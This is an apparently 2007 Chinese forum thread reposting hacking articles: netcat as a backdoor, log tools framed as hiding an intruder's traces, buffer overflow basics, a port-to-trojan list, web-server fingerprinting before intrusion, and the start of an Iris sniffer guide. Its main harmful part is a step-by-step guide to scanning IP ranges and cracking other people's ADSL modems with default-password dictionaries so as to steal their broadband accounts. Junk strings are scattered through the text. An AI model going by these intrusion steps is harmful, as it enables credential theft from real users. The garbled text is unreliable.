　　这是一个简单而有用的工具，能够通过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能。　　2、查找Linux下的蛛丝马迹：日志工具

　　对于高明的攻击者来说，进入系统后，还应了解自己的“蛛丝马迹”并清除这些痕迹，自然就要了解一些日志工具了。

　　（1）logcheck

　　logchek 可以自动地检查日志文件，定期检查日志文件以发现违反安全规则以及异常的活动。它先把正常的日志信息剔除掉，把一些有问题的日志保留下来，然后把这些信息 email 给系统管理员。logcheck 用 logtail 程序记住上次已经读过的日志文件的位置，然后从这个位置开始处理新的日志信息。logcheck 主要由下面几个主要的文件：

logcheck.sh	可执行的脚本文件，记录logcheck检查那些日志文件等，我们可以把它加入crontab中定时运行。
logcheck.hacking	是logcheck 检查的模式文件。和下面的文件一起，按从上到下的顺序执行。这个文件表明了入侵活动的模式。
logcheck.violations	这个文件表示有问题，违背常理的活动的模式。优先级小于上面的那个模式文件。
logcheck.violations .ignore	这个文件和上面的logcheck.violations的优先是相对的，是我们所不关心的问题的模式文件。
logcheck.ignore	这是检查的最后一个模式文件。如果没有和前三个模式文件匹配，也没有匹配这个模式文件的话，则输出到报告中。
Logtail	记录日志文件信息。

Logcheck首次运行时读入相关的日志文件的所有内容，Logtail会在日志文件的目录下为每个关心的日志文件建立一个logfile.offset 的偏移量文件，以便于下次检查时从这个偏移量开始检查。Logcheck执行时，将未被忽略的内容通过邮件的形式发送给 logcheck.sh 中系统管理员指定的用户。

　　（2）logrotate

　　一般Linux 发行版中都自带这个工具。它可以自动使日志循环，删除保存最久的日志，它的配置文件是 /etc/logrotate.conf，我们可以在这个文件中设置日志的循环周期、日志的备份数目以及如何备份日志等等。在/etc/logrotate.d目录下，包括一些工具的日志循环设置文件，如syslog等，在这些文件中指定了如何根据/etc/logrotate.conf做日志循环，也可以在这里面添加其他的文件以循环其他服务的日志。

　　（3）swatch

　　swatch 是一个实时的日志监控工具，我们可以设置感兴趣的事件。Swatch 有两种运行方式：一种可以在检查日志完毕退出，另一种可以连续监视日志中的新信息。Swatch提供了许多通知方式，包括email、振铃、终端输出、多种颜色等等。安装前，必须确保系统支持perl。swatch 软件的重点是配置文件swatchmessage，这个文本文件告诉 swatch 需要监视什么日志，需要寻找什么触发器，和当触发时所要执行的动作。当swatch发现与swatchmessage中定义的触发器正则表达式相符时，它将执行在 swatchrc中定义的通知程序。

　　当然，上面所介绍的软件只是Linux大海中的几只美丽的贝壳，随着越来越多的用户加入到Linux大军中，我们相信，优秀的Hack也将越来越多，这反过来也将促进Linux操作系统逐步走向成熟，我们拭目以待。

[ 本帖最后由 grjboy30 于 2007-12-2 11:32 编辑 ]

grjboy30 发布于2007-12-01 23:45:39: 回复 #4 grjboy30 的帖子
不知道为什么上面的表格就是变不过来
gS)B0fSNblog.ixpub.net
编辑的时候是可以的

grjboy30 发布于2007-12-01 23:45:58: DDoS攻击：“缓存溢出”新变形　　最近，一种被称为“缓存溢出（buffer overflow）”的设计缺陷，正在严重危害着系统的安全，成为比y2k更为头痛的问题。一旦这个缺陷被别有用心的人发现，就会被利用作为非法入侵的一种手段，破坏电脑中的资料。据统计，通过缓存溢出进行的攻击占所有系统攻击总数的80%以上，最近各大网站所遭受的所谓分布式服务拒绝（ddos）式的攻击也是一种利用缓存溢出原理的攻击方式。

7MfT(\3e"zy!o3nIXPUB技术博客　　简单地说，缓存溢出是指一种攻击系统的手段，通过往程序的缓冲区中写入超出其长度的内容造成溢出，从而破坏程序的堆栈，使程序转而执行其它指令，而达到攻击的目的。分布式拒绝服务（ddos）的入侵者采用的是输入很长的字串，将通讯栏等区域填到超过设计的容量，有些多余字串就会被电脑误认为是执行密码，使入侵者有机会进入电脑，而同时系统无法察觉。有报告指出，“缓存溢出”是过去十年发生的非常普遍的电脑安全问题，入侵者可以利用它完全控制电脑。
Y+f}zR tIXPUB技术博客
Z
y7i*DS0Z5i2^[IXPUB技术博客　　■ 缓存溢出黑客们的惯用伎俩
,~9[4E:o0_%B9I8x/hblog.ixpub.netDZ!`Ud:Yc/m
　　在unix系统中，通过缓存溢出来获得root权限是目前使用得相当普遍的一种黑客技术。事实上这是一个黑客在系统本地已经拥有了一个基本账号后的首选攻击方式。它也被广泛应用于远程攻击，通过对daemon进程的堆栈溢出来实现远程获得rootshell的技术，已经有很多实例。 IXPUB技术博客2\3Z%t[.J
T
}Em:|[*S
在windows系统中，同样存在着缓存溢出的问题。而且，随着internet的普及，win系列平台上的internet服务程序越来越多，低水平的win程序就成为你系统上的致命伤，因为它们同样会发生远程堆栈溢出。而遥捎趙in系统使用者和管理者普遍缺乏安全防范意识，一台win系统上的堆栈溢出，如果被恶意利用，将导致整个机器被黑客所控制，进而可能导致整个局域网落入黑客之手。在微软的产品iis server4.0中就被发现存在一种被称为“非法htr请求”的缺陷。据微软称，此缺陷在特定情况下会导致任意代码都可以在服务器端运行。黑客可以利用这一漏洞对iis服务器进行完全的控制，而实际上许多电子商务站点恰恰是基于这套系统的。

　　■ 黑客如何搅乱缓存

F_qXe4B4qTIXPUB技术博客　　下面让我们了解一下缓存溢出的原理。众说周知，c语言不进行数组的边界检查，在许多运用c语言实现的应用程序中，都假定缓冲区的大小是足够的，其容量肯定大于要拷贝的字符串的长度。然而事实并不总是这样，当程序出错或者恶意的用户故意送入一过长的字符串时，便有许多意想不到的事情发生，超过的那部分字符将会覆盖与数组相邻的其他变量的空间，使变量出现不可预料的值。如果碰巧，数组与子程序的返回地址邻近时，便有可能由于超出的一部分字符串覆盖了子程序的返回地址，而使得子程序执行完毕返回时转向了另一个无法预料的地址，使程序的执行流程发生了错误。甚至，由于应用程序访问了不在进程地址空间范围的地址，而使进程发生违例的故障。这种错误其实是编程中常犯的。

　　一个利用缓冲区溢出而企图破坏或非法进入系统的程序通常由如下几个部分组成： IXPUB技术博客Z"K^%}W!c3Eg
blog.ixpub.nety:b+G9_m
　　1．准备一段可以调出一个shell的机器码形成的字符串，在下面我们将它称为shellcode。
\_U|Hn6hhblog.ixpub.netT?z)W
Z3j5m!A
　　2．申请一个缓冲区，并将机器码填入缓冲区的低端。 IXPUB技术博客$\P&t+h(_G
y0k7uhDL8lq
　　3．估算机器码在堆栈中可能的起始位置，并将这个位置写入缓冲区的高端。这个起始的位置也是我们执行这一程序时需要反复调用的一个参数。
whn.M*C O:Jmj{IXPUB技术博客mY7H0{4\.[\Y
　　4．将这个缓冲区作为系统一个有缓冲区溢出错误程序的入口参数，并执行这个有错误的程序。 ^@#x'i'X.Z&e&h

4e ^yp(z.E　　通过以上的分析和实例，我们可以看到缓存溢出对系统的安全带来的巨大威胁。在unix系统中，使用一类精心编写的程序，利用suid程序中存在的这种错误可以很轻易地取得系统的超级用户的权限。当服务程序在端口提供服务时，缓冲区溢出程序可以轻易地将这个服务关闭，使得系统的服务在一定的时间内瘫痪，严重的可能使系统立刻宕机，从而变成一种拒绝服务的攻击。这种错误不仅是程序员的错误，系统本身在实现的时候出现的这种错误更多。如今，缓冲区溢出的错误正源源不断地从unix、windows、路由器、网关以及其他的网络设备中被发现，并构成了对系统安全威胁数量最大、程度较大的一类。

grjboy30 发布于2007-12-01 23:46:17: 黑客软件最常用的连接端口　　以下这些是我搜集的一些黑客软件的连接端口，有些朋友经常问我一些关于端口名称的问题，我在这里做一个列表，将端口与名称集中公布，这样，方便你来分析端口的安全性，如果我的列表不全，或者你有新发现，或者是我这里有错误，那么，请你一定要告诉我，大家一起把他完善了。
IXPUB技术博客q+xl G4R!yA]/P
以下数据仅作参考

%V].v vm8^uIXPUB技术博客协议端口=黑客程序
TCP 7=Echo IXPUB技术博客"L:p8n3l!I*Gh8j2j"A
TCP 20=FTP Data
+`(D*]#hL@!ne1lblog.ixpub.netTCP 21=Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash
!T0G8Vc`-in\TCP 23=Telnet, Tiny Telnet Server (= TTS) blog.ixpub.net`i\g-zVMZ,{
TCP 25=SMTP, Ajan, Antigen, Email Password Sender, Happy 99, Kuang2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
TCP 31=Agent 31, Hackers Paradise, Masters Paradise
TCP 41=DeepThroat
TCP 43=WHOIS
TCP 53=DNS,Bonk (DOS Exploit)
TCP 59=DMSetup
Y^9E1o?,R4K6vm,GyTCP 70=Gopher IXPUB技术博客(w5WQ3MYph+M
TCP 79=Firehotcker, Finger IXPUB技术博客"xO/Su&N/T3K6zr
TCP 80=Http服务器, Executor, RingZero
P2G0W2ljPblog.ixpub.netTCP 99=Hidden Port
TCP 110=Pop3服务器, ProMail IXPUB技术博客 BR`nyb
TCP 113=Kazimas, Auther Idnet IXPUB技术博客%Wo:S5e)W+~*`X
TCP 119=Nntp, Happy 99
TCP 121=JammerKiller, Bo jammerkillah R)wE;T(_ef,E9z
//TCP 137=NetBios-NS
//TCP 138=NetBios-DGN
5mN-uj
p:@4A;N//TCP 139=NetBios-SSN n1c(kaCB
TCP 143=IMAP
i [-S
~7M/P.BM
TCP 161=Snmp
TCP 162=Snmp-Trap
TCP 194=Irc
TCP 421=TCP Wrappers
%\j_K5}"MoTCP 456=Hackers paradise
TCP 531=Rasmin f;V
Vc
e4I~yI+u)m&n
TCP 555=Ini-Killer, Phase Zero, Stealth Spy
9lg~~Y
@:_f~?blog.ixpub.netTCP 666=Attack FTP, Satanz Backdoor 6N#UEM,h[
TCP 808=RemoteControl
TCP 911=Dark Shadow
+]2A3[+vm&Y7^TCP 999=DeepThroat
TCP 1001=Silencer, WebEx
j1tafsoc!g
@GTCP 1010=Doly
TCP 1011=Doly
TCP 1012=Doly
+|c#a2E%y"m9_ay*]kTCP 1015=Doly 7l W)Oro,|O!q
D
TCP 1024=NetSpy.698(YAI)
//TCP 1025=NetSpy.698
//TCP 1033=Netspy blog.ixpub.netEfC8`f3m
//TCP 1042=Bla
!l"_ cU+|8[,oF//TCP 1045=Rasmin
0Zp1\5|A
H+g9w'Bblog.ixpub.net//TCP 1047=GateCrasher
TCP 1080=Wingate
//TCP 1090=Xtreme, VDOLive
//TCP 1170=Psyber Stream Server, Streaming Audio trojan
//TCP 1234=Ultors blog.ixpub.net
Y1_y}:C$B
rO5I3M5A
//TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse
//TCP 1245=VooDoo Doll
//TCP 1269=Mavericks Matrix
//TCP 1492=FTP99CMP(BackOriffice.FTP) R6YAQ~$lD
//TCP 1509=Psyber Streaming Server 0['l^gm
Zb(l7F
//TCP 1600=Shivka-Burka
//TCP 1807=SpySender
//TCP 1981=Shockrave ,hd&^
LVY
//TCP 1999=BackDoor, TransScout
)v(P_B
`-Imblog.ixpub.net//TCP 2001=TrojanCow
//TCP 2023=Ripper, Pass Ripper mfU(tK9zO
//TCP 2115=Bugs
//TCP 2140=Deep Throat, The Invasor
//TCP 2155=Illusion Mailer blog.ixpub.netb/`E{2bV2c+k_
//TCP 2283=HVL Rat5 IXPUB技术博客e6M-N|d$V\:k+p
//TCP 2565=Striker
R7U#Rep+Sx//TCP 2583=WinCrash
//TCP 2600=Digital RootBeer
//TCP 2801=Phineas Phucker blog.ixpub.net%M.Q1rZ(Y cf0mp"\
//TCP 3024=WinCrash trojan UPAB!k$P
//TCP 3128=RingZero
$Zk$m!U1bgY#\3Q/F//TCP 3129=Masters Paradise v2C8rs:A{
//TCP 3150=Deep Throat, The Invasor IXPUB技术博客[xPK7FOwP&Bx
//TCP 3210=SchoolBus blog.ixpub.netQ'B!vL*d&u
//TCP 3459=Eclipse 2000 9WVq2AU5l)t
//TCP 3700=Portal of Doom
//TCP 3791=Eclypse
TCP 4000=腾讯OICQ客户端
TCP 4092=WinCrash
TCP 4321=BoBo
TCP 4567=File Nail 6I+uhRq
TCP 4590=ICQTrojan
TCP 5000=Bubbel, Back Door Setup, Sockets de Troie
TCP 5001=Back Door Setup, Sockets de Troie
PyZ9CUAblog.ixpub.netTCP 5011=One of the Last Trojans (OOTLT)
TCP 5031=Firehotcker %z:G4QSPQ$d
TCP 5190=ICQ Query IXPUB技术博客| [5ZcWG-W!Dw!`
TCP 5321=Firehotcker
g[!v:AiTCP 5400=Blade Runner, BackConstruction1.2
:l,?m3sXxblog.ixpub.netTCP 5401=Blade Runner RM!G]2}T9N*c
TCP 5402=Blade Runner Z%^%~&T'T;A
TCP 5550=Xtcp IXPUB技术博客lI+ceI*lWd
TCP 5555=ServeMe
{2l(Y
s#Z\blog.ixpub.netTCP 5556=BO Facil IXPUB技术博客_;oy~
]b,e
qN'B3H
TCP 5557=BO Facil
TCP 5569=Robo-Hack
;_
Nrdhg'F(]ATCP 5631=PCAnyWhere data
TCP 5714=Wincrash3
TCP 5742=WinCrash
TCP 6400=The Thing
TCP 6667=NT Remote Control
_6j V_;B
`#_TM9Fblog.ixpub.netTCP 6669=Vampyre
TCP 6670=DeepThroat
M4f)j;L7z7S&Aeblog.ixpub.netTCP 6711=SubSeven
TCP 6771=DeepThroat
,w%nf0Zm6`$]H!S#^8hTCP 6776=BackDoor-G, SubSeven

Cs
l/\%quUsIXPUB技术博客TCP 6883=DeltaSource
@,?Kgr&VmE"B,iblog.ixpub.netTCP 6912=Shit Heep
XK!n7Ktr2in:MTCP 6939=Indoctrination
TCP 6969=GateCrasher, Priority, IRC 3
TCP 6970=GateCrasher
(ZT7_dw.h^&vQIXPUB技术博客TCP 7000=Remote Grab
TCP 7300=NetMonitor
TCP 7301=NetMonitor
m0kM.YjREs0j2@TCP 7306=NetMonitor
TCP 7307=NetMonitor, ProcSpy 3DQ9tHR
Q*xr[
TCP 7308=NetMonitor, X Spy
TCP 7323=Sygate服务器端
TCP 7626=冰河
TCP 7789=Back Door Setup, ICKiller IXPUB技术博客G2N*x_Z:u$nS3H@
TCP 8000=XDMA, 腾讯OICQ服务器端
TCP 8010=Logfile HS3A0|UBp0g+bmw
TCP 8080=WWW 代理, Ring Zero IXPUB技术博客0SMha}
TCP 9400=InCommand
TCP 9401=InCommand
TCP 9402=InCommand blog.ixpub.net'~T2Q!S;yC
TCP 9872=Portal of Doom 4e.TJD${C|zIM
TCP 9873=Portal of Doom
TCP 9874=Portal of Doom
TCP 9875=Portal of Doom
TCP 9876=Cyber Attacker
TCP 9878=TransScout IXPUB技术博客,]^[i-c\0\P!t,j
TCP 9989=Ini-Killer
KSz&O7|4H0lF~$H}
TCP 10101=BrainSpy
wdc4_ZtTCP 10167=Portal Of Doom
TCP 10520=Acid Shivers
TCP 10607=Coma trojan ` F-jq-BF.i/x
TCP 11000=Senna Spy
TCP 11223=Progenic Dh6Q:DCd!?
d!D
TCP 12076=Gjamer, MSH.104b
$a7mn6^;I+UTCP 12223=Hack?9 KeyLogger /]St$H;v
TCP 12345=GabanBus, NetBus, Pie Bill Gates, X-bill \%{.uq7~(n
TCP 12346=GabanBus, NetBus, X-bill
TCP 12361=Whack-a-mole
^[f"^V.ZdTCP 12362=Whack-a-mole
TCP 12631=WhackJob
B`]y}rX$~TCP 13000=Senna Spy
]X9T9A+u(NoC&wblog.ixpub.netTCP 16969=Priority
TCP 17300=Kuang2 The Virus
TCP 20000=Millennium II (GrilFriend)
TCP 20001=Millennium II (GrilFriend)
TCP 20034=NetBus 2 Pro 3a%p
DX*AaTJ1S
TCP 20203=Logged
&eD |/i$T$j_ [ITCP 20331=Bla
4w2W'iDAg-E0p,wNblog.ixpub.netTCP 21544=Schwindler 1.82, GirlFriend
TCP 22222=Prosiak
w0|X q
blp
NTCP 23456=Evil FTP, Ugly FTP, WhackJob
TCP 23476=Donald Dick
]xnu6B.yf!K#U
TCP 23477=Donald Dick
h]4P#A(V.M%b(qTCP 27374=Sub Seven 2.0+
TCP 29891=The Unexplained %oYQ,s,o)Y
TCP 30029=AOL trojan
TCP 30100=NetSphere 1.27a, NetSphere 1.31 IXPUB技术博客2bi+i;L:qS&_
TCP 30101=NetSphere 1.31, NetSphere 1.27a
TCP 30102=NetSphere 1.27a, NetSphere 1.31 blog.ixpub.net0_$jA"cB1R6t,Nqg
C
TCP 30103=NetSphere 1.31
6JMZ7KW{,tz xgf}TCP 30303=Sockets de Troie
-x\(J!QR"O{(}!kTCP 30999=Kuang2
TCP 31336=Bo Whack 5e3t.eT;OZC`1g
TCP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice, DeepBO
$K
f6Q'N(wG&^[
_TCP 31339=NetSpy DK
2tq*e5m+~y1S0A0RmkTCP 31666=BOWhack NF Z9Z]&xylX-V
TCP 31785=Hack Attack
TCP 31787=Hack Attack
H_*@U9|,oY'B(Ablog.ixpub.netTCP 31789=Hack Attack
ChA+R
H9j[)scTCP 31791=Hack Attack W+Jo|
Co
TCP 33333=Prosiak
YRh ?R6PP(N|TCP 33911=Spirit 2001a
TCP 34324=BigGluck, TN (pR:Nhm(^N)Q7wFi
TCP 40412=The Spy
TCP 40421=Agent 40421, Masters Paradise.96 ~*u_8X$j&r
TCP 40422=Masters Paradise 9S
Y
n0t b
TCP 40423=Masters Paradise.97
TCP 40426=Masters Paradise blog.ixpub.net kySXQ
l
TCP 47878=BirdSpy2
TCP 50505=Sockets de Troie
0h|2UdPq f6O"b4MC9Oblog.ixpub.netTCP 50766=Fore, Schwindler
TCP 53001=Remote Windows Shutdown IXPUB技术博客9i8p5g2g,L]+W
TCP 54320=Back Orifice 2000 IXPUB技术博客dG%Xsv
TCP 54321=School Bus .69-1.11
TCP 60000=Deep Throat blog.ixpub.netS-h$ALh'R%]HF}
TCP 61466=Telecommando |YEMI3^+`+i4]E t
TCP 65000=Devil
3f"L0G[LY*bUDP 1349=BO dll
-C]5n&_L9MUDP 2989=RAT blog.ixpub.net)r
z&z+ESv.s
UDP 3801=Eclypse
UDP 10067=Portal of Doom blog.ixpub.netp#YC
C-d3S
UDP 10167=Portal of Doom
X E5f0a1ypN|0E'xUDP 26274=Delta Source
3Y+B:IX[\oUDP 29891=The Unexplained
jfdRNu:_blog.ixpub.netUDP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice, DeepBO
{5H W(J
hp%NUDP 31338=Back Orifice, NetSpy DK, DeepBO
UDP 31789=Hack aTack
UDP 31791=Hack aTack
dUDa5LV5uZIXPUB技术博客UDP 47262=Delta Source
UDP 54321=Back Orifice 2000

grjboy30 发布于2007-12-01 23:46:34: 黑客技术：三招确定WWW服务类型　　入侵目标之前有一个分析目标主机的阶段，那么现在就来谈一下关于入侵服务器前是如何分析对方的（也就是入侵前的资料搜集，当然搜集到的资料越详尽的帮助就越大），虽然现在一些牛人开发了好用的工具，但是我们总不能依赖着那些X-Scan、流光等全自动的分析，扫描工具。因为要成为高手、大侠也应学会不要依赖工具的思想，这技术才有所提高，同时也因为一般有条件的服务器也有专业的IDS系统，如果盲目的利用这类型的工具，对方的IDS系统就会响个不停，到时候可能你的X-Scan或流光的进度条才完成10%，网警就按你家的门铃了。那我们应该如何来进行入侵前的资料搜集呢？ (Zn*p$z-EgL

　　第一式：WWW服务器应答报文的分析，也就是看看服务器的BANNER（读这里的仅限菜鸟，高手把这个机会留给徒弟们吧）。这种方法在以前是比较常用的，也比较准确。为了有更多的资料给小菜们，我在这里也提一提吧。分析这类的报文件最好用NC来抓取，喜欢图形界面的朋友也可以用“WSockExpert”这个工具. IXPUB技术博客$CP1c y:U

　　HTTP/1.1 200 OK 0ZTd9]p\W%w6gS

7`/t Oj,{h
]　　Date: Sun， 20 Feb 2005 00:43:03 GMT
B|"yo'E+Y$B'e;w
　　Server: Apache/2.0.48 (Win32) PHP/4.3.1
e/_#C%N2b)Z$\%N:k`C
　　Accept-Ranges: bytes
WcPt3C:W!a o0BaIXPUB技术博客YnY$b.L;\-kMP
　　X-Powered-By: PHP/4.3.1
(q}Hjyblog.ixpub.netIXPUB技术博客t?%S)I1R6Jfi[
　　Transfer-Encoding: chunked "P#S]$|
A]W3?

/D_x&u.wf,fQ　　Content-Type: text/html; charset=gb2312 g}&]n3V7U
IXPUB技术博客0sFH5Jx
　　这行“Server: Apache/2.0.48 (Win32) PHP/4.3.1”就回应出服务器的相关信息，它是使用Windows操作系统，可惜这种方法在现在这个时代的并不准确。因为Banner可以随意来修改，你可以把MS的IIS改成*NUX的APACHE，或改成你自己出品的IIS，只要盖茨不反对你就可以了。那如何分大概分出对的服务器呢？
'HcKq3cf~
r1G$@
|F
K#q&|9T7m-CwJG　　第二式：对服务器的目录进行访问，看看服务器的回应是怎么样的。一般对直接访问服务器的目录就可以大体分析出对方的系统是*NUX或Windows。例如对方是个产品展示的网站，通常网站都是由图片来增加其色彩的，你可以去访问一下这网站里的图片目录。如：http://localhost/images/a.jpg，你就可以在浏览器里通过 “http://localhost/images”来进行访问。如果对方是MS的IIS，那么一般情况下它会返回的是：“Directory Listing Denied”和“This Virtual Directory does not allow contents to be listed.”这两句话。如果对文件配置了目录索引的，这就会列出文件。 )LXm[y

　　IIS的回应就是这样，如果是Apache的回应又是如何呢，Apache的服务器回应的一般有IIS的禁访问或文件的索引列表。不过它的回应就与IIS的有差别了。下面这个图的图就是Apache返回的信息。以同样的方法去访问相应的目录。当目录存在时，如果目录没有设置默认的文件列表索引，那么它会回应：“403 Forbidden”，并时有回应对文件的服务器的版本信息：
a|A9d%F/SP2n1R;|Kblog.ixpub.neteI8r-\LM!Y)R*Y:P_
　　这还告诉我们它的服务器是Apache，且版本是Win32位的2.048，也就是对方的WWW服务器是运行在Windows上的APACHE，够易懂了吧！但是，一些网管不愿这些出错的信息带给访问者，通常会把出错的页面带到正常的页面，如首页或上一页又或者是出错报告的页面。那么，一般的新手也很难分辩出对方在耍什么把戏！下面我们引用一个更合理的分析。 blog.ixpub.netcj2wZ9A^%r,z^!f

/XC
f`AIXPUB技术博客　　第三式：利用文件名的差异性。对操作系统有所认识的人也许知道文件名的问题。如在Windows系统上，文件名通常是由26个字母和10个啊拉伯数字来组成的。*NUX系统上的也与Windows关系道理上相同，但是有一个不同点的就是Windows上的文件名里的字母大小写并不敏感。也就是“ABC.eXe”和”abC.ExE”认定为同一个文件。而在*NUX系统上，这种事情是不容许的。根据这两种系统的之间的差异性，我们可以有.对性地进行目标分析。如将浏览器访问的页面URL进行变异：例如在浏览器的地址栏上有http://localhost/index.php这个URL，把“/”后面的页面名“.php”改成“.phP”，如果是Windows系统的话，它也会正常访问到这个页面。如果是*NUX系统的，它就会提示找不到这个文件。顺理成章，就这样不费什么工具就可以知道对方是什么来头了。
9K'v8Gf3]\
MIXPUB技术博客E d*}^p#d_J8}7Q(_:Z
　　对服务器的分析只要灵活结合以上的三种方法，95%的系统都可以分析出来。本来我并没有打算写这些的，因为觉得这些方法比较有效，且为了能使爱好者或网管有更好地了解系统方面的知识，努力奋战，写了这些。如果有更好的方法欢迎来黑防论坛探讨！

grjboy30 发布于2007-12-01 23:46:52: 一分钟攻破ADSL 盗遍宽带密码　　一、指定入侵IP地址
(s8F*B9i1@3mp9\l[^{&]Q
　　在入侵ADSL猫之前，我们首先要从指定的IP地址段中，找到使用ADSL猫自动拨号上网的宽带用户，这就离不开扫描工具了。ADSL密码终结者2005中已经自带了扫描工具，而且还提供了IP地址段查询功能，可以方便的指定要入侵的IP地址段。 blog.ixpub.net4z9SJnr1x |zy%g

o\E.O
szIXPUB技术博客　　运行ADSL密码终结者2005后，点击“扫描选项”标签，在“开始IP(S)”中填上要扫描的IP范围的起始IP地址（如图1），比如“60.220.1.1”，然后在“结束IP(E)”中填写IP范围的结尾IP地址，比如“60.220.254.254”，下面状态栏会出现此IP范围内总的IP数目。最后点击“加入列表（A）”将此IP段加入到IP列表。“备注”可以不用填，程序会自动加上。
+U?:V/A9BCE3Vc[attachment=1267]
8i;[_PPjL
@3aIXPUB技术博客 @/K5a4]1`HS*]
　　如果不知道自己所在地区的IP地址段，或者想入侵某个指定地区的ADSL猫，可以使用软件的IP地址查询功能。以笔者为例，所在地为贵州安顺，想要破解入侵当地的ADSL上网帐号，点击界面中的“工具”选项卡，在这里有一个IP数据库查询功能。首先选择查询类型为“地址→IP”，然后在查询字段中输入要查询的地区名称“安顺”。然后点击“查询”按钮，很快就会在下方的列表中显示所在地的IP地址段了（如图2）。
YAJ_
D;QKe
　　使用IP地址查询功能，也可以方便地查询出某个IP地址段所对应的物理位置。只需要选择查询类型为“IP→地址”，输入要查询的IP地址点击查询按钮即可。

fDWP,N pNH　　使用Shift键选择列表中的所有IP地址段，然后点击右键，在弹出菜单中选择“添加到IP范围列表”命令，可将所有IP地址自动添加到扫描选项页面列表中。
S6Iu%N@s*J"FRblog.ixpub.net
&{*h%l@y,I　　二、设置扫描选项
$n*ZNZ2ev*Zm'il
-yI@6@%X9~x5}(m4RIXPUB技术博客　　许多ADSL猫的默认设置页面都是通过80端口进行访问的，但是有的用户可能会更改此端口，一些特殊类型的ADSL猫，可能也需要指定某个特定的端口。在“扫描选项”页面中的“端口”处，可以设置此端口（如图3）。
i$FD1~|
W HQ[attachment=1268] 9~d6S\ @n%M~
blog.ixpub.netn'K+D9Vz:Zp
　　另外可以指定扫描的线程数，采用多线程进行扫描。不过要注意的是，线程数越大，扫描速度越快，但是可能会占用大量系统资源，如果机器性能不高或者网络带宽不够，不要用太大的线程数，一般使用400线程即可。
bFGQxJ$eblog.ixpub.net
%K%hr&?w']e+M(WfRF　　在“超时”项中可以设置指定超时值，超时值越大，扫描速度会慢，在网络质量不太好的情况下，可以将该值设置较大些。
!oX\U"eu6iIXPUB技术博客ADSL密码终结者2005是通过密码字典破解扫描到的ADSL猫登录密码的，程序已经自带了目前铁通和电信部门常用的ADSL猫默认用户名和密码。也可以在扫描选项中的“ADSL密码字典”处，指定密码字典文件的路径，或直接在下方的列表窗口中添加某个类型ADSL猫的默认用户名和密码。 ?mNj!rC,q

　　自己制作密码字典时，需要将用户名和密码按“用户名=密码”的格式添加到字典中，一行一个信息。 blog.ixpub.net4go|
Asmn(h
　　三、扫描破解一步完成
V4H'|xLyKFCWblog.ixpub.netLa(GQ0zL,D5_
　　设置完扫描破解选项后，就可以开始对指定IP段的ADSL猫进行入侵了。点击界面中的“扫描”标签，然后点击中间的“开始”按钮，程序就开始自动扫描指定IP范围内的每一台主机（如图4）。如果该IP使用的是ADSL猫自动拨号上网，程序就会使用密码字典自动破解此猫的登录密码，不用再像以前一样一个个地手工登录测试了。如果成功登录到ADSL猫的管理页面，程序还会自动搜索保存在网页中的宽带拨号上网的帐号和密码，并将其显示在列表中！ @9g1h,h,kk
[attachment=1269]

　　显示在列表中的IP地址，表示该IP地址对应的ADSL猫使用了自动拨号上网方式（如图5）。并且在列表还会显示该IP地址对应的ADSL猫登录用户名和密码，及该ADSL猫的类型品牌信息，同时还会显示该IP对应的地理位置。从图中可以看到已经破解出了一个ADSL猫的登录用户名密码，该ADSL猫对应的IP地址为“220.172.127.55”，并且得到了该ADSL猫主人的宽带上网帐号和密码！——怎么样，够简单吧！！
kJO^#zw0I9[(G[attachment=1270]
Wf%P-[Qblog.ixpub.netblog.ixpub.net6glq6b3P6q
　　另外如果在某个IP地址后没有显示上网帐号和密码的话，可能是因为此种类型的ADSL猫不能被程序所识别。可以在列表中选择此IP地址，点击右键，在弹出菜单中选择“进入管理界面”命令（如图6），即可用显示的ADSL用户名和密码登录此IP对应的ADSL猫的设置页面。然后通过查看网页源代码得到上网帐号和密码，具体的方法就不用我多说了吧？n;[)}g
TK_

[attachment=1271]
{/j.C \q+]`uk9U
　　四、管理破获的帐号密码
blog.ixpub.net+D0_'iCz9{,o
k%]6d
　　所有扫描并破解到的ADSL帐号密码都将自动保存在数据库中，并且会再添加上该帐号所在省市地理位置。点击程序界面中的“密码管理”标签，选择左侧窗口中的“全部记录”，在右侧列表窗口中可以看到所有帐号密码记录。点击展开“地址分类”后，可以看到程序自动按IP对应的物理地址分类中的ADSL猫信息和上网帐号密码记录（如图7）。
IXPUB技术博客.AL*a@ O
j*E%q,Xa
[attachment=1272]

f$L&s;[3E/hp4t)P1ZIXPUB技术博客　　如果保存的记录太多，可以在界面下方选择“搜索”标签，在出现的搜索栏中设置搜索条件为IP地址或地区等，输入关键词后，点击“查找”按钮，即可快速的查找到保存记录中符合条件的宽带上网帐号和密码信息（如图8）。
[attachment=1273] IXPUB技术博客Mkdq"}%?.WNR/~,s

　　在笔者的测试过程中，只不过用了短短的一分钟，就将自己所在的C段IP地址中的三个ADSL上网帐号密码给破解出来了，真是非常恐怖！“ADSL密码终结者2005”对一些不注意ADSL猫安全的宽带用户来说，带来的将会是一场灾难！——宽带上网帐号密码被修改，ADSL猫设置被破坏，上网帐号被用来充Q币、互联星空消费等，这些损失的造成，也许不过就是短短几分钟内的事情。

grjboy30 发布于2007-12-01 23:47:11: Iris网络嗅探器使用与技巧　　(以下内容部分翻译自iris自带的帮助文件

n[
{-t;_B&kLIxS*nsR"E*O
　　1.【Iris简介】 IXPUB技术博客%ui
oz$Br-d2y

Q/h@V8xU　　一款性能不错的嗅探器。嗅探器的英文是Sniff，它就是一个装在电脑上的窃非法词，监视通过电脑的数据。
　　
h'j4P6}\"zVIXPUB技术博客
h@wt*s5FI#mW.Wblog.ixpub.net　　2.【Iris的安装位置】 IXPUB技术博客X3G$LgWu]Q

